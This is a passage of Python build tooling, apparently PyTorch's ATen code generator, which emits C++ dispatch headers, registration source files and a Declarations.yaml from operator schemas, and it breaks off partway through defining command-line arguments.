# Generates RegisterBackendSelect.cpp, a series of kernels which provide
# specialized computation of dispatch key for operator signatures which cannot
# be easily done automatically using templating.
@dataclass(frozen=True)
class ComputeBackendSelect:
target: Union[
Literal[Target.DEFINITION],
Literal[Target.REGISTRATION]
]
# Selector object to determine which operators to generate
# registration code for.
selector: SelectiveBuilder
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if not needs_backend_select(f, self.selector):
return None
name = native.name(f.func)
native_sig = NativeSignature(f.func)
native_tensor_args = [
a for a in native_sig.arguments()
if isinstance(a.argument, Argument) and a.argument.type.is_tensor_like()
]
dispatcher_sig = DispatcherSignature.from_schema(f.func)
sig: Union[NativeSignature, DispatcherSignature]
sig = dispatcher_sig
dispatcher_exprs = dispatcher_sig.exprs()
dispatch_key = "c10::computeDispatchKey(dtype, layout, device)"
if self.target is Target.DEFINITION:
# I don't think there's actually a good reason to generate
# these two cases differently
# The first case could probably be improved though- it calls computeDispatchKeySet(),
# which looks at TLS dispatch keys- there should not be any by the time we reach backend select.
if native_tensor_args:
tensor_args = ', '.join(a.name for a in native_tensor_args)
compute_dk = f"""\
DispatchKeySet _dk_set = c10::DispatchKeySet({dispatch_key}) | c10::detail::multi_dispatch_key_set({tensor_args});
DispatchKeySet _dk_mask = c10::DispatchKeySet(DispatchKeySet::FULL_AFTER, DispatchKey::BackendSelect);
DispatchKeySet _dk = c10::impl::computeDispatchKeySet(_dk_set, _dk_mask);"""
else:
compute_dk = f"DispatchKeySet _dk = c10::DispatchKeySet({dispatch_key});"
return f"""\
// aten::{f.func}
C10_ALWAYS_INLINE
{sig.defn(name)} {{
{compute_dk}
return at::_ops::{f.func.name.unambiguous_name()}::redispatch(
_dk, {', '.join(a.expr for a in dispatcher_exprs)});
}}
"""
elif self.target is Target.REGISTRATION:
return f"""m.impl("aten::{f.func.name}", TORCH_FN({name}));"""
else:
assert_never(self.target)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# YAML CODE GENERATION
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def format_yaml(data: object) -> str:
# Ignore alias in Dumper
YamlDumper.ignore_aliases = lambda self, data: True # type: ignore[assignment]
# Support serializing OrderedDict
def dict_representer(dumper: Any, data: Any) -> Any:
return dumper.represent_dict(data.items())
YamlDumper.add_representer(OrderedDict, dict_representer) # type: ignore[no-untyped-call]
# Some yaml parsers (e.g. Haskell's) don't understand line breaks.
# width=1e9 turns off optional line breaks and improves
# the portability of the outputted yaml.
return yaml.dump(data, default_flow_style=False, Dumper=YamlDumper, width=1e9) # type: ignore[no-any-return]
# For some reason, some defaults we write to YAML are written as native
# YAML objects, rather than doing them uniformly as strings. This
# function detects those cases and converts them into native Python
# objects.
def pythonify_default(s: str) -> object:
if s == 'true':
return True
elif s == 'false':
return False
try:
return int(s)
except ValueError:
try:
return float(s)
except ValueError:
return s
# What is a dynamic type? Over time, the semantic meaning of
# dynamic type has degraded to meaninglessness (in the old days,
# it captured dtype-ness of types, but that has gone away with
# the removal of TH). These days, it's mostly the same thing as
# the C++ API argument type, except that Tensor and Tensor?
# arguments simply present as Tensor.
#
# TODO: Get rid of dynamic_type, after getting tools/autograd
# to use the new codegen framework
def dynamic_type(t: Type) -> str:
if isinstance(t, OptionalType):
return dynamic_type(t.elem)
# Note we don't use t.is_tensor_like() here because it would
# also include Tensor[]
if str(t) == 'Tensor':
return 'at::Tensor'
return cpp.argumenttype_type(t, mutable=False, binds='__placeholder__').cpp_type()
def compute_method_of_yaml(variants: Set[Variant]) -> List[str]:
# This is written out explicitly to ensure that Tensor and
# namespace are put into the list in the right order
method_of = ['Type']
if Variant.method in variants:
method_of.append('Tensor')
if Variant.function in variants:
method_of.append('namespace')
return method_of
def compute_returns_yaml(f: NativeFunction) -> Tuple[List[Dict[str, str]], Dict[str, str]]:
# Note [name and field_name]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~
# To understand name_to_field_name, we must first talk about this
# schema:
#
# lstsq.X(Tensor self, Tensor A, *, Tensor(a!) X, Tensor(b!) qr) -> (Tensor(a!) solution, Tensor(b!) QR)
#
# There is something very odd about this schema: it is an out
# variant of the function (that is to say, it will convert into
# at::lstsq_out() in the C++ API), but the names of the output
# return arguments don't match the keyword argument names of
# the inputs. It TURNS OUT that in this situation, the historical
# Declarations.yaml we want to output is this (abbreviated to
# only show relevant fields):
#
# arguments:
# ...
# - field_name: solution
# name: X
# - field_name: QR
# name: qr
# ...
#
# returns:
# - field_name: solution
# name: X
# - field_name: QR
# name: qr
#
# The name of the return fields is stored in 'field_name', and the
# name of the arguments is stored in 'name'. So when we process
# arguments, we need a way to get at the corresponding return. At
# the moment, this is most conveniently done by constructing a
# mapping from name (the argument concept) to field_name (the
# return concept) while processing return arguments, since we don't
# directly maintain this correspondence in the modeling of function
# schema itself.
#
# See also https://github.com/pytorch/pytorch/issues/43114
name_to_field_name: Dict[str, str] = {}
# Compute the returns field of the YAML entry
names = cpp.return_names(f)
returns = []
for i, (r, name) in enumerate(zip(f.func.returns, names)):
ret = {
'dynamic_type': dynamic_type(r.type),
'name': name,
'type': cpp.return_type(r).cpp_type(),
}
if r.name:
# See Note [name and field_name]
ret['field_name'] = r.name
if f.func.is_out_fn():
name_to_field_name[f.func.arguments.out[i].name] = r.name
returns.append(ret)
return returns, name_to_field_name
# arguments in yaml roughly corresponds to the public C++ API
def compute_cpp_argument_yaml(cpp_a: Binding, *, schema_order: bool, kwarg_only_set: Set[str],
out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
if isinstance(cpp_a.argument, TensorOptionsArguments):
arg: Dict[str, object] = {
'annotation': None,
'dynamic_type': 'at::TensorOptions',
'is_nullable': False,
'name': cpp_a.name,
'type': cpp_a.type,
'kwarg_only': True,
}
if cpp_a.default is not None:
arg['default'] = cpp_a.default
return arg
elif isinstance(cpp_a.argument, SelfArgument):
raise AssertionError()
elif isinstance(cpp_a.argument, Argument):
return compute_argument_yaml(
cpp_a.argument, schema_order=schema_order,
kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
def compute_argument_yaml(a: Argument, *, schema_order: bool, kwarg_only_set: Set[str],
out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
arg: Dict[str, object] = {
'annotation': str(a.annotation) if a.annotation else None,
'dynamic_type': dynamic_type(a.type),
'is_nullable': a.type.is_nullable(),
'name': a.name,
'type': cpp.argument_type(a, binds="__placeholder__").cpp_type(),
}
if a.default is not None:
arg['default'] = pythonify_default(cpp.default_expr(a.default, a.type))
if a.name in kwarg_only_set:
arg['kwarg_only'] = True
if a.name in out_arg_set:
arg['output'] = True
arg['allocate'] = True
# See Note [name and field_name]
if a.name in name_to_field_name:
arg['field_name'] = name_to_field_name[a.name]
# Historically, booleans don't get their size recorded, because it
# is already built into the cpp type (e.g., std::array<bool, 4>)
l = a.type.is_list_like()
if l is not None and l.size is not None and str(l.elem) != 'bool':
arg['size'] = l.size
return arg
@with_native_function
def compute_declaration_yaml(f: NativeFunction) -> object:
returns, name_to_field_name = compute_returns_yaml(f)
# These sets are used to conveniently test if an argument is a
# kwarg-only or out argument
kwarg_only_set = set(a.name for a in f.func.arguments.flat_kwarg_only)
out_arg_set = set(a.name for a in f.func.arguments.out)
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False)
cpp_args = sig_group.signature.arguments()
arguments = [
compute_cpp_argument_yaml(
cpp_a, schema_order=False,
kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
for cpp_a in cpp_args
]
schema_order_jit_arguments = list(f.func.schema_order_arguments())
schema_order_arguments = [
compute_argument_yaml(
a, schema_order=True,
kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
for a in schema_order_jit_arguments
]
cpp_schema_order_types = [
# NB: method here doesn't matter
r.type for a in schema_order_jit_arguments
for r in cpp.argument(
a, method=False, cpp_no_default_args=set(), faithful=False, has_tensor_options=False)
]
cpp_returns = cpp.returns_type(f.func.returns).cpp_type()
schema_order_cpp_signature = f"{cpp_returns} ({', '.join(cpp_schema_order_types)})"
is_factory_method = any(isinstance(a.argument, TensorOptionsArguments) for a in cpp_args) \
and Variant.method not in f.variants
return OrderedDict([
('name', cpp.name(f.func)),
('operator_name', str(f.func.name.name)),
('overload_name', str(f.func.name.overload_name)),
('manual_kernel_registration', f.manual_kernel_registration),
('category_override', f.category_override if f.category_override is not None else ''),
('schema_string', f'aten::{f.func}'),
('arguments', arguments),
('schema_order_cpp_signature', schema_order_cpp_signature),
('schema_order_arguments', schema_order_arguments),
('method_of', compute_method_of_yaml(f.variants)),
('mode', 'native'),
('python_module', '' if f.python_module is None else f.python_module),
('returns', returns),
('inplace', f.func.name.name.inplace),
('is_factory_method', is_factory_method),
('abstract', f.is_abstract),
('device_guard', f.device_guard),
('with_gil', False),
('deprecated', False),
('has_math_kernel', f.has_composite_implicit_autograd_kernel),
])
# See Note [Auto generated composite kernels]
def has_autogenerated_composite_kernel(f: NativeFunction) -> bool:
return (f.structured or f.structured_delegate is not None) and \
(f.func.kind() == SchemaKind.functional or f.func.kind() == SchemaKind.inplace)
@with_native_function_and_indices
def compute_registration_declarations(f: NativeFunction, backend_indices: Dict[DispatchKey, BackendIndex]) -> str:
name = dispatcher.name(f.func)
returns_type = dispatcher.returns_type(f.func.returns).cpp_type_registration_declarations()
args = dispatcher.arguments(f.func)
args_str = ', '.join(a.no_default().decl_registration_declarations() for a in args)
comment_data : Dict[str, str] = {
'schema': f'aten::{f.func}',
# TODO: What exactly is the semantics of the 'dispatch' field?
'dispatch': str({k for k, v in backend_indices.items() if v.has_kernel(f)} != {DispatchKey.CompositeImplicitAutograd}),
'default': str(f.has_composite_kernel or has_autogenerated_composite_kernel(f))
}
return f"""{returns_type} {name}({args_str}); // {json.dumps(comment_data)}
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# RUN IT ALL
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def get_custom_build_selector(
provided_op_registration_allowlist: Optional[List[str]],
op_selection_yaml_path: Optional[str]) -> SelectiveBuilder:
assert not (
provided_op_registration_allowlist is not None and
op_selection_yaml_path is not None), (
"Both provided_op_registration_allowlist and " +
"op_selection_yaml_path can NOT be provided at the " +
"same time.")
op_registration_allowlist: Optional[Set[str]] = None
if provided_op_registration_allowlist is not None:
op_registration_allowlist = set(provided_op_registration_allowlist)
if op_registration_allowlist is not None:
selector = SelectiveBuilder.from_legacy_op_registration_allow_list(
op_registration_allowlist,
True,
False,
)
elif op_selection_yaml_path is not None:
selector = SelectiveBuilder.from_yaml_path(op_selection_yaml_path)
else:
selector = SelectiveBuilder.get_nop_selector()
return selector
def pre_group_native_functions(
native_functions: Sequence[NativeFunction]) -> Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]]:
pre_grouped_native_functions: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = defaultdict(dict)
for f in native_functions:
d = pre_grouped_native_functions[f.func.signature()]
assert f.func.kind() not in d
d[f.func.kind()] = f
return pre_grouped_native_functions
def get_grouped_native_functions(
native_functions: Sequence[NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
def flatten_pre_group(d: Dict[SchemaKind, NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
r = NativeFunctionsGroup.from_dict(d)
if r is None:
return list(d.values())
else:
return [r]
# TODO: how come ValuesView isn't a Sequence lol
pre_grouped_native_functions = pre_group_native_functions(native_functions)
return list(concatMap(flatten_pre_group, list(pre_grouped_native_functions.values())))
def gen_aggregated_headers(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
cpu_fm: FileManager,
cuda_fm: FileManager,
functions_keys: Set[DispatchKey],
dispatch_keys: Sequence[DispatchKey],
rocm: bool,
) -> None:
# Buck doesn't support dynamic output files, so we aggregate all operator
# headers into a single file
structured_native_functions = [g for g in grouped_native_functions
if isinstance(g, NativeFunctionsGroup)]
cpu_fm.write('NativeMetaFunctions.h', lambda: {
'NativeMetaFunctions_includes': [],
'NativeMetaFunctions_declarations': list(
mapMaybe(compute_meta_function_declaration, structured_native_functions)),
})
method_native_functions = [fn for fn in native_functions
if Variant.method in fn.variants]
non_method_native_functions = [fn for fn in native_functions
if fn not in method_native_functions]
cpu_fm.write('MethodOperators.h', lambda: {
'MethodOperators_includes': [],
'MethodOperators_declarations': list(mapMaybe(ComputeOperators(
Target.DECLARATION), method_native_functions)),
})
cpu_fm.write('Operators.h', lambda: {
'Operators_includes': ['#include <ATen/MethodOperators.h>'],
'Operators_declarations': list(mapMaybe(ComputeOperators(
Target.DECLARATION), non_method_native_functions)),
})
cpu_fm.write('Functions.h', lambda: {
'static_dispatch_extra_headers': static_dispatch_extra_headers(static_dispatch_idx),
'Functions_includes': ['#include <ATen/Operators.h>'],
'Functions_declarations': list(mapMaybe(ComputeFunction(
static_dispatch_backend_index=static_dispatch_idx), native_functions)),
})
cpu_fm.write('NativeFunctions.h', lambda: {
'NativeFunctions_includes': ['#include <ATen/NativeMetaFunctions.h>'],
'NativeFunctions_declarations': list(concatMap(
# Convert to a set first to remove duplicate kernel names.
# Backends are allowed to repeat kernel names; only generate the declaration once!
lambda f: list(OrderedDict.fromkeys(concatMap(
lambda backend_idx:
dest.compute_native_function_declaration(f, backend_idx),
backend_indices.values()))),
grouped_native_functions)),
})
for dispatch_key in dispatch_keys:
fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
if dispatch_key in functions_keys:
if dispatch_key in static_dispatch_keys(static_dispatch_idx):
# See Note [Avoiding Include Cycles In Static Dispatch]
inl_headers = ''
else:
inl_headers = f'#include <ATen/{dispatch_key}Functions_inl.h>'
fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
'dispatch_key': str(dispatch_key),
'inline_headers_for_nonstatic_build': inl_headers,
})
fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
'DispatchKeyFunctions_inl_includes': [],
'dispatch_namespace': dispatch_key.lower(),
'dispatch_namespaced_declarations': list(concatMap(
dest.RegisterDispatchKey(
backend_indices[dispatch_key],
Target.NAMESPACED_DECLARATION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
})
del fm
def gen_per_operator_headers(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
cpu_fm: FileManager,
cuda_fm: FileManager,
ops_fm: FileManager,
functions_keys: Set[DispatchKey],
dispatch_keys: Sequence[DispatchKey],
rocm: bool,
) -> None:
# For CMake builds, split operator declarations into separate headers in
# the ATen/ops folder to split up header dependencies
functions_by_root_name: Dict[str, List[NativeFunction]] = defaultdict(lambda: [])
for fn in native_functions:
functions_by_root_name[fn.root_name].append(fn)
grouped_functions_by_root_name: Dict[str, List[Union[NativeFunction, NativeFunctionsGroup]]] = defaultdict(lambda: [])
for group in grouped_native_functions:
name = group.root_name
grouped_functions_by_root_name[name].append(group)
for name, functions in functions_by_root_name.items():
ops_fm.write_with_template(
f'{name}_ops.h', 'Operator.h', lambda: {
'declarations': list(mapMaybe(ComputeOperators(
Target.DECLARATION), functions)),
})
ops_fm.write_with_template(
f'{name}.h', 'Function.h', lambda: {
'static_dispatch_ops_headers': list(mapMaybe(
lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
functions)),
'operator_includes': f'#include <ATen/ops/{name}_ops.h>',
'function_definitions': list(mapMaybe(ComputeFunction(
static_dispatch_backend_index=static_dispatch_idx), functions)),
})
grouped_functions = grouped_functions_by_root_name.get(name, [])
structured_functions = [fn for fn in grouped_functions
if isinstance(fn, NativeFunctionsGroup) and fn.structured]
is_structured = len(structured_functions) > 0
if is_structured:
ops_fm.write_with_template(
f'{name}_meta.h', 'NativeMetaFunction.h', lambda: {
'meta_function_declarations': list(mapMaybe(
compute_meta_function_declaration, structured_functions)),
})
ops_fm.write_with_template(
f'{name}_native.h', 'NativeFunction.h', lambda: {
'extra_includes': (f'#include <ATen/ops/{name}_meta.h>'
if is_structured else []),
'native_function_declarations': list(concatMap(
# Convert to a set first to remove duplicate kernel names.
# Backends are allowed to repeat kernel names; only generate the declaration once!
lambda f: list(OrderedDict.fromkeys(concatMap(
lambda backend_idx:
dest.compute_native_function_declaration(f, backend_idx),
backend_indices.values()))),
grouped_functions)),
})
for category, suffix in [
('Functions', ''),
('Operators', '_ops'),
('NativeMetaFunctions', '_meta'),
('NativeFunctions', '_native'),
]:
cpu_fm.write(f'{category}.h', lambda: {
'static_dispatch_extra_headers': [],
f'{category}_includes': [
f'#include <ATen/ops/{name}{suffix}.h>'
for name in sorted(functions_by_root_name.keys())
],
f'{category}_declarations': [],
})
for dispatch_key in dispatch_keys:
if dispatch_key not in functions_keys:
continue
dispatch_namespace = dispatch_key.lower()
dispatch_names = []
for name, functions in functions_by_root_name.items():
grouped_functions = grouped_functions_by_root_name.get(name, [])
declarations = list(concatMap(
dest.RegisterDispatchKey(
backend_indices[dispatch_key],
Target.NAMESPACED_DECLARATION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_functions
))
if len(declarations) == 0:
continue
dispatch_names.append(name)
ops_fm.write_with_template(
f'{name}_{dispatch_namespace}_dispatch.h',
'DispatchKeyFunction.h', lambda: {
'dispatch_namespace': dispatch_namespace,
'dispatch_namespaced_declarations': declarations,
})
fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
if dispatch_key in static_dispatch_keys(static_dispatch_idx):
# See Note [Avoiding Include Cycles In Static Dispatch]
inl_headers = ''
else:
inl_headers = f'#include <ATen/{dispatch_key}Functions_inl.h>'
fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
'dispatch_key': str(dispatch_key),
'inline_headers_for_nonstatic_build': inl_headers,
})
fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
'dispatch_namespace': dispatch_namespace,
'DispatchKeyFunctions_inl_includes': [
f'#include <ATen/ops/{name}_{dispatch_namespace}_dispatch.h>'
for name in sorted(dispatch_names)
],
'dispatch_namespaced_declarations': [],
})
del fm
cpu_fm.write('MethodOperators.h', lambda: {
'MethodOperators_includes': sorted(
f'#include <ATen/ops/{name}_ops.h>'
for name, functions in functions_by_root_name.items()
if any(Variant.method in fn.variants for fn in functions)
),
'MethodOperators_declarations': [],
})
def gen_headers(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
core_fm: FileManager,
cpu_fm: FileManager,
cuda_fm: FileManager,
ops_fm: FileManager,
dispatch_keys: Sequence[DispatchKey],
functions_keys: Set[DispatchKey],
rocm: bool,
per_operator_headers: bool,
) -> None:
if per_operator_headers:
gen_per_operator_headers(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
ops_fm=ops_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=rocm,
)
else:
gen_aggregated_headers(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=rocm,
)
def static_dispatch_method_headers() -> List[str]:
return list(mapMaybe(
lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
[fn for fn in native_functions if Variant.method in fn.variants]))
core_fm.write('TensorBody.h', lambda: {
'static_dispatch_ops_headers': (
static_dispatch_method_headers() if per_operator_headers
else static_dispatch_extra_headers(static_dispatch_idx, skip_tensor_include=True)),
'tensor_method_declarations': list(mapMaybe(ComputeTensorMethod(
target=Target.DECLARATION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
'tensor_method_definitions': list(mapMaybe(ComputeTensorMethod(
target=Target.DEFINITION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
})
cpu_fm.write('RedispatchFunctions.h', lambda: {
'function_redispatch_definitions': list(mapMaybe(ComputeRedispatchFunction(), native_functions)),
})
cpu_fm.write('RegistrationDeclarations.h', lambda: {
'registration_declarations': [compute_registration_declarations(f, backend_indices) for f in native_functions],
})
cpu_fm.write('FunctionalInverses.h', lambda: {
'view_inverse_declarations': list(mapMaybe(gen_functionalization_view_inverse_declaration, native_functions))
})
def gen_aten_interned_strings() -> Dict[str, str]:
attrs = set() # All function argument names
names = set() # All ATen function names
for func in native_functions:
names.add(str(func.func.name.name))
# Some operators don't have a functional variant but we still create a
# symbol without the underscore
names.add(func.func.name.name.base)
for arg in func.func.schema_order_arguments():
attrs.add(arg.name)
# These are keywords in C++, so aren't valid symbol names
# https://en.cppreference.com/w/cpp/language/operator_alternative
names -= set(['and', 'and_eq', 'bitand', 'bitor', 'compl', 'not',
'not_eq', 'or', 'or_eq', 'xor', 'xor_eq'])
return {
'aten_symbols': ' \\\n'.join([
f"_(aten, {name})" for name in sorted(names)
]),
'attr_symbols': ' \\\n'.join([
f"_(attr, {name})" for name in sorted(attrs)
]),
}
core_fm.write('aten_interned_strings.h', gen_aten_interned_strings)
def gen_source_files(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
core_fm: FileManager,
cpu_fm: FileManager,
cuda_fm: FileManager,
dispatch_keys: Sequence[DispatchKey],
functions_keys: Set[DispatchKey],
rocm: bool,
force_schema_registration: bool,
per_operator_headers: bool,
) -> None:
extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
if rocm:
extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''
for dispatch_key in dispatch_keys:
fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
if per_operator_headers:
def operator_headers() -> List[str]:
headers = []
for fn in native_functions:
is_registered = backend_index.has_kernel(fn) or (
fn.structured and dispatch_key in
(DispatchKey.Meta, DispatchKey.CompositeExplicitAutograd))
if not is_registered:
continue
headers.append(f"#include <ATen/ops/{fn.root_name}_native.h>")
if dispatch_key == DispatchKey.CompositeExplicitAutograd:
headers.append(f"#include <ATen/ops/{fn.root_name}.h>")
if dispatch_key in functions_keys:
headers.append(
f"#include <ATen/ops/{fn.root_name}_{dispatch_namespace}_dispatch.h>")
return sorted(set(headers))
else:
def operator_headers() -> List[str]:
headers = ["#include <ATen/NativeFunctions.h>"]
if dispatch_key == DispatchKey.CompositeExplicitAutograd:
headers.append("#include <ATen/Functions.h>")
if dispatch_key in functions_keys:
headers.append(f"#include <ATen/{dispatch_key!s}Functions.h>")
return headers
backend_index = backend_indices[dispatch_key]
dispatch_namespace = str(dispatch_key).lower()
fm.write_with_template(f'Register{dispatch_key}.cpp', 'RegisterDispatchKey.cpp', lambda: {
'extra_cuda_headers': extra_cuda_headers if is_cuda_dispatch_key(dispatch_key) else '',
'external_backend_headers': '',
'dispatch_headers': dest.gen_registration_headers(backend_index, per_operator_headers, rocm),
'ops_headers': operator_headers(),
'DispatchKey': dispatch_key,
'dispatch_namespace': dispatch_key.lower(),
'dispatch_helpers': dest.gen_registration_helpers(backend_index),
'dispatch_namespaced_definitions': list(concatMap(
dest.RegisterDispatchKey(
backend_index,
Target.NAMESPACED_DEFINITION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
'dispatch_anonymous_definitions': list(concatMap(
dest.RegisterDispatchKey(
backend_index,
Target.ANONYMOUS_DEFINITION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
'dispatch_registrations': list(concatMap(
dest.RegisterDispatchKey(
backend_index,
Target.REGISTRATION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
})
# BackendSelect is generated specially
def gen_backend_select() -> Dict[str, List[str]]:
relevant_fns = [fn for fn in native_functions if needs_backend_select(fn, selector)]
return {
'ops_headers': [f'#include <ATen/ops/{fn.root_name}_ops.h>' for fn in relevant_fns],
'backend_select_method_definitions':
list(mapMaybe(ComputeBackendSelect(Target.DEFINITION, selector), relevant_fns)),
'backend_select_function_registrations':
list(mapMaybe(ComputeBackendSelect(Target.REGISTRATION, selector), relevant_fns)),
}
cpu_fm.write('RegisterBackendSelect.cpp', gen_backend_select)
schema_selector = selector
if force_schema_registration:
schema_selector = SelectiveBuilder.get_nop_selector()
cpu_fm.write('RegisterSchema.cpp', lambda: {
'schema_registrations': list(mapMaybe(RegisterSchema(schema_selector), native_functions)),
})
def key_func(fn: Union[NativeFunction, NativeFunctionsGroup]) -> str:
return fn.root_name
cpu_fm.write_sharded(
'Operators.cpp',
native_functions,
key_fn=key_func,
env_callable=lambda fn: {
'operator_headers': [f'#include <ATen/ops/{fn.root_name}.h>'],
'definitions': [ComputeOperators(Target.DEFINITION)(fn)]},
num_shards=5,
sharded_keys={'operator_headers', 'definitions'}
)
cpu_fm.write('Functions.cpp', lambda: {})
core_fm.write('TensorMethods.cpp', lambda: {})
core_fm.write('ATenOpList.cpp', lambda: {
'aten_ops': list(mapMaybe(compute_aten_op, native_functions)),
})
# We need to easily map from [inplace_op_name] -> [functional_op] for the functionalization pass,
# so here I generate a mapping from every operator name to its corresponding functional NativeFunction (if it exist).
pre_grouped_d: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = pre_group_native_functions(native_functions)
to_functional_op: Dict[OperatorName, Optional[NativeFunction]] = {
k: v for d in [
{f.func.name: pre_grouped_d[func][SchemaKind.functional]
if SchemaKind.functional in pre_grouped_d[func].keys() else None
for f in pre_grouped_d[func].values()}
for func in pre_grouped_d.keys()]
for k, v in d.items()
}
def functionalization_env_callable(
g: Union[NativeFunction, NativeFunctionsGroup]
) -> Dict[str, List[str]]:
functions = [g] if isinstance(g, NativeFunction) else list(g.functions())
functions_needing_functionalization = [
fn for fn in functions if needs_functionalization(selector, fn)]
return {
'ops_headers': ([
f"#include <ATen/ops/{functions[0].root_name}_native.h>",
f"#include <ATen/ops/{functions[0].root_name}_ops.h>",
] if functions_needing_functionalization else []),
'func_definitions': list(mapMaybe(
lambda f: gen_functionalization_definition(selector, f, to_functional_op[f.func.name]),
functions_needing_functionalization)),
'func_registrations': list(mapMaybe(
lambda f: gen_functionalization_registration(
selector, f, backend_indices[DispatchKey.CompositeImplicitAutograd]),
functions_needing_functionalization)),
}
cpu_fm.write_sharded(
'RegisterFunctionalization.cpp',
grouped_native_functions,
key_fn=key_func,
env_callable=functionalization_env_callable,
num_shards=4,
sharded_keys={'ops_headers', 'func_definitions', 'func_registrations'}
)
def gen_declarations_yaml(
cpu_fm: FileManager,
native_functions: Sequence[NativeFunction]) -> None:
cpu_fm.write('Declarations.yaml', lambda:
format_yaml([compute_declaration_yaml(f) for f in native_functions]))
def main() -> None:
parser = argparse.ArgumentParser(description='Generate ATen source files')
parser.add_argument(
'-s',
'--source-path',
help='path to source directory for ATen',
default='aten/src/ATen')
parser.add_argument(
'-o',
'--output-dependencies',
help='output a list of dependencies into the given file and exit')
parser.add_argument(
'--dry-run', action='store_true',
help='run without writing any files (still updates outputs)')
parser.add_argument(
'--per-operator-headers', action='store_true',
help='generate separate headers per operator in ATen/ops')
parser.add_argument(
'-d', '--install_dir', help='output directory',
default='build/aten/src/ATen')
parser.add_argument(
'--rocm',
action='store_true',
help='reinterpret CUDA as ROCm/HIP and adjust filepaths accordingly')
# TODO: --op_registration_whitelist will be removed when all call-sites
# for gen.py are moved over to using the operator YAML file for mobile
# custom build.
parser.add_argument(
'--op_registration_whitelist',
nargs='*',
help='filter op registrations by the whitelist (if set); '
'each item is `namespace`::`operator name` without overload name; '
'e.g.: aten::empty aten::conv2d ...')
parser.add_argument(
'--op_selection_yaml_path',
help='Provide a path to the operator selection (for custom build) YAML '
'that contains the information about the set of selected operators '
'and their categories (training, ...). Each operator is either a '
'full operator name with overload or just a bare operator name. '
'The operator names also contain the namespace prefix (e.g. aten::)')
parser.add_argument(
'--backend_whitelist',
nargs='*',
help='filter dispatch backend by the whitelist (if set), '
'e.g.: CPU CUDA QuantizedCPU ...')
parser.add_argument(
'--static_dispatch_backend',
help='generate static dispatch code for the specific backend (if set)')
parser.add_argument(
'--force_schema_registration',
